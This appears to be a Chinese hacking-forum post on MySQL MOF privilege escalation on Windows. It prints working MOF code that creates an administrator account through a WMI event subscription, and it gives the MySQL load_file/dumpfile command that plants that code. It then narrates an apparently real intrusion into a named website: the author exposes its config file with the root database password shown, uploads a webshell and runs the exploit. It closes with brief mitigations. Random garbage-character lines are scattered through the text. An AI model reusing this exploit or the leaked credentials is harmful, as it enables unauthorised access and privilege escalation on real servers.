Mysql mof扩展漏洞实例与防范

admin

Mysql mof扩展漏洞防范方法
) X+ E" K( w! f
网上公开的一些利用代码:

& V7 S& z1 a- _1 H$ P6 ^#pragma namespace(“\\\\.\\root\\subscription”)
# q. w" ?# D% l  `, `: @
instance of __EventFilter as $EventFilter   {   EventNamespace = “Root\\Cimv2″;   Name  = “filtP2″;   Query = “Select * From __InstanceModificationEvent ”   “Where TargetInstance Isa \”Win32_LocalTime\” ”   “And TargetInstance.Second = 5″;   QueryLanguage = “WQL”;   };   instance of ActiveScriptEventConsumer as $Consumer   {   Name = “consPCSV2″;   ScriptingEngine = “JScript”;   ScriptText =   “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add\”)”;   };   instance of __FilterToConsumerBinding   {   Consumer   = $Consumer;   Filter = $EventFilter;   };

; a" h/ S9 f! k$ m7 H1 w/ Q" w$ |9 ~


" w( }# q8 B0 q% |% c( E
: t1 G5 w* l3 l9 Z, z3 X连接mysql数据库后执行： select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
从上面代码来看得出解决办法：

+ I3 G  v+ J% h0 s1、mysql用户权限控制，禁止 “load_file”、”dumpfile”等函数
+ E8 ~: z' p; z8 @
5 B' y- C0 v# J. I  ]# M" F( f2、禁止使用”WScript.Shel”组件
! L. F: Q6 z( n' H. _6 c
3、目录权限c:/windows/system32/wbem/mof/ 删除内置特殊组CREATOR OWNER
# R- s0 u( E# x! F; s8 F9 Y
+ _: ^/ V) W( X4 y* N! m, O4 T当然上面是网上说的 感觉需要的权限很大 比如 root 还有mysql外链昨天碰到了就给大家演示下

事情是这样发生的  一机油在论坛提问我就看了下 发现已经有大牛搞下了 说是用是 mysql mof扩展提权
' S3 A! ]/ A5 s& [
但是小菜发现没有听过于是赶紧去查资料学习…就有了上面的来着网上的内容

) S9 M+ y) e2 w8 Y7 p看懂了后就开始练手吧
; i% R# ?5 u$ y+ R+ b
http://www.webbmw.com/config/config_ucenter.php 一句话 a

$_config['db']['1']['dbhost'] = ‘localhost’; $_config['db']['1']['dbuser'] = ‘root’; $_config['db']['1']['dbpw'] = ‘tfr226206′; $_config['db']['1']['dbcharset'] = ‘gbk’; $_config['db']['1']['pconnect'] = ’0′; $_config['db']['1']['dbname'] = ‘webbmw’; $_config['db']['1']['tablepre'] = ‘pre_’; $_config['db']['common']['slave_except_table'] = ”; 有root密码啊。
$ Z* A. A$ I5 l) \4 C& v5 G
5 ^- m% A) g* v% S, d2 |( k于是直接用菜刀开搞

4 O1 Z8 e3 c. r' i上马先

; i: {" ]7 M9 |# o4 g1 E既然有了那些账号 之类的 于是我们就执行吧…….

小小的说下
& H8 D: P+ D) `1 t, w4 V/ R7 N! `
在这里第1次执行未成功        原因未知

我就猜想是否是因为我们执行的代码有问题 于是我就去我wooyun找的代码。
9 ], n% k* o2 s+ n
#pragma namespace(“\\\\.\\root\\subscription”)

: j7 {+ C0 L- M( kinstance of __EventFilter as $EventFilter   {   EventNamespace = “Root\\Cimv2″;   Name  = “filtP2″;   Query = “Select * From __InstanceModificationEvent ”   “Where TargetInstance Isa \”Win32_LocalTime\” ”   “And TargetInstance.Second = 5″;   QueryLanguage = “WQL”;   };   instance of ActiveScriptEventConsumer as $Consumer   {   Name = “consPCSV2″;   ScriptingEngine = “JScript”;   ScriptText =   “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user test test /add\”)”;   };   instance of __FilterToConsumerBinding   {   Consumer   = $Consumer;   Filter = $EventFilter;   };
/ h* R& H, b, c  h% g6 }# I7 q
! ?/ X' Z- N  j& B7 `我是将文件放到C:\WINDOWS\temp\1.mof

所以我们就改下执行的代码

- e" N# D+ g7 ^select load_file(‘C:\WINDOWS\temp\1.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;

* `3 a: D* s/ m  j! p, }

. q# O$ F' O/ ^# P# {8 {" ?2 ^但是 你会发现账号还是没有躺在那里。。
( J- @% M/ }, s  }4 I
于是我就感觉蛋疼

就去一个一个去执行 但是执行到第2个 mysql时就成功了………

4 a) u9 s) S' k5 g  w

: o( i* s: L5 o, ]8 I2 V6 P. O但是其他库均不成功…

我就很费解呀 到底为什么不成功求大牛解答…
/ C* N) S3 U) }: h2 Z7 H
* J/ ~; U7 O9 G" e! j​
3 p0 A' u2 M' L( T2 Y+ _8 T* d